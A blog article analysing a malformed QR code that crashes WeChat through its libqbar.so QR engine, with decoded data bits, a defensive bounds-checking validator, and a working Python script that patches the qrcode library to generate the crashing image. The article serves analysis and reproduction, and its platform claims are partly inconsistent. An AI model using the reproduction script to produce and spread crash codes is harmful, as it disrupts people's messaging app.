Why a Single QR Code Crashes WeChat: Inside the Memory Leak Bug
An unusual QR code triggers a memory leak in WeChat’s OCR engine, causing the app to crash on both mobile and desktop. The article explains the underlying null‑pointer exception, shows how the malformed “abnormal QR code” corrupts libqbar.so, and provides Python code to reproduce the bug using OpenCV’s open‑source QR engine.
WeChat QR code crash bug
A QR code recently circulating online causes WeChat to crash within seconds of scanning it, or even of just clicking the code. The crash shows a “WeChat runtime exception, please update to the latest version” prompt.
Testing reproduces the crash on iOS but not on Windows 10.
The issue is attributed to the QR code engine’s OCR component, which suffers a memory leak leading to a null‑pointer exception and crashes the entire client.
How the QR code engine works
The engine automatically recognizes QR codes in the chat list.
When the engine encounters the malformed QR code, a null‑pointer exception occurs, causing the QR module to crash.
The crash propagates to the whole WeChat client.
The same engine is used in other Tencent apps, so they may be affected as well.
Technical analysis
The problematic QR code is a “malformed QR code” that contains erroneous data blocks, causing libqbar.so to crash.
Decoding the QR code reveals that the data area is fully filled (224 bits) and the padding pattern is missing, leading to out‑of‑bounds reads and incorrect mode switches.
Final data bits :
00101111111110000101110100010001010001110011000010100000111011000001000111101100000100011110110000010001111011000001000111101100
[0010] [111111111] [0000101110100010001010001110011000010100000111011000001000111101100000100011110110000010001111011000001000111101100]
Mode Indicator : Alphanumeric Mode (0010)
Character Count Indicator : 511
Decoded data : 2333AA76%J5L1QVFA.380Cundefinedundefinedundefinedundefined……
Final Decoded string : 2333AA76%J5L1QVFA.380C
Reproduction script
import qrcode
from qrcode.util import QRData, MODE_8BIT_BYTE

# Data-codeword capacity for QR versions 1-9 at error-correction level L
NUM_BLOCKS = [19, 34, 55, 80, 108, 136, 156, 194, 232]


def tencent_crash_qrcode(message: str, filename='crash.png'):
    def hack_put(self, num, length):
        # Replacement for BitBuffer.put: a value of 0 is written as 1
        if num == 0:
            num = 1
        for i in range(length):
            self.put_bit(((num >> (length - i - 1)) & 1) == 1)

    data = message.encode('utf-8')
    data_len = len(data)
    # Pick the smallest version whose capacity holds the message plus 3 bytes
    version = 1
    while version <= len(NUM_BLOCKS) and data_len + 3 > NUM_BLOCKS[version-1]:
        version += 1
    if version > len(NUM_BLOCKS):
        raise Exception('message too long')
    # Pad the message with spaces up to the chosen capacity
    data += b' ' * (NUM_BLOCKS[version-1] - data_len - 3)
    qr = qrcode.QRCode(version, qrcode.constants.ERROR_CORRECT_L)
    comm_data = QRData(data, MODE_8BIT_BYTE)
    hack_data = QRData(b'', MODE_8BIT_BYTE)  # second, empty byte-mode segment
    qr.add_data(comm_data, 0)
    qr.add_data(hack_data, 0)
    # Swap in the patched put() only while the image is built, then restore it
    original_put = qrcode.util.BitBuffer.put
    qrcode.util.BitBuffer.put = hack_put
    try:
        qr.make_image().save(filename)
    finally:
        qrcode.util.BitBuffer.put = original_put


# Example usage
# tencent_crash_qrcode('KFCVW50')

Running the script generates a QR code that crashes WeChat on iOS and macOS.
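The technical analysis above shows a segment header declaring 511 alphanumeric characters in a data area far too small to hold them. As an added example (not from the original article and not WeChat's code), the check below parses the quoted data bits, compares the declared count with the bits actually available, and decodes only the pairs that really exist; the function name `check_alnum_segment` is hypothetical and the 9-bit count width assumes QR versions 1 to 9.

```python
# Added example: validate a QR alphanumeric segment header before decoding it.
ALNUM = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ $%*+-./:"

# "Final data bits" copied from the article's analysis.
PAGE_BITS = "00101111111110000101110100010001010001110011000010100000111011000001000111101100000100011110110000010001111011000001000111101100"


def check_alnum_segment(bits: str) -> dict:
    """Parse mode and character count, then check the count against the buffer."""
    if len(bits) < 13 or set(bits) - {"0", "1"}:
        raise ValueError("need at least a 13-bit header of 0/1 characters")
    mode, declared = bits[:4], int(bits[4:13], 2)  # 9-bit count: versions 1-9 (assumption)
    if mode != "0010":
        raise ValueError(f"not an alphanumeric segment (mode {mode})")
    payload = bits[13:]
    # Alphanumeric mode packs two characters into 11 bits, a lone last one into 6.
    needed = 11 * (declared // 2) + 6 * (declared % 2)
    in_bounds = needed <= len(payload)
    # A strict decoder rejects here; for triage, decode only pairs that really exist.
    count = declared if in_bounds else 2 * (len(payload) // 11)
    chars, pos = [], 0
    for _ in range(count // 2):
        value = int(payload[pos:pos + 11], 2)
        if value >= 45 * 45:
            raise ValueError("pair value outside the alphanumeric table")
        chars += [ALNUM[value // 45], ALNUM[value % 45]]
        pos += 11
    if count % 2:
        value = int(payload[pos:pos + 6], 2)
        if value >= 45:
            raise ValueError("character value outside the alphanumeric table")
        chars.append(ALNUM[value])
    return {"declared_chars": declared, "needed_bits": needed,
            "available_bits": len(payload), "in_bounds": in_bounds,
            "decoded": "".join(chars)}


if __name__ == "__main__":
    print(check_alnum_segment(PAGE_BITS))
    # Constructed well-formed segment: count = 2, one pair encoding "AA".
    print(check_alnum_segment("0010" + "000000010" + "00111001100"))
```

A production decoder would treat `in_bounds == False` as a hard reject; the partial decode is kept here only to show where the article's decoded string comes from.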
Related incidents
On March 29, Tencent’s WeChat and QQ services experienced a major outage affecting voice calls, Moments, payments, and file transfers. The company classified it as a level‑one incident, and regulators demanded improved safety‑production management.
Images above illustrate the crash behavior and the malformed QR code.
Programmer DD
A tinkering programmer and author of "Spring Cloud Microservices in Action"
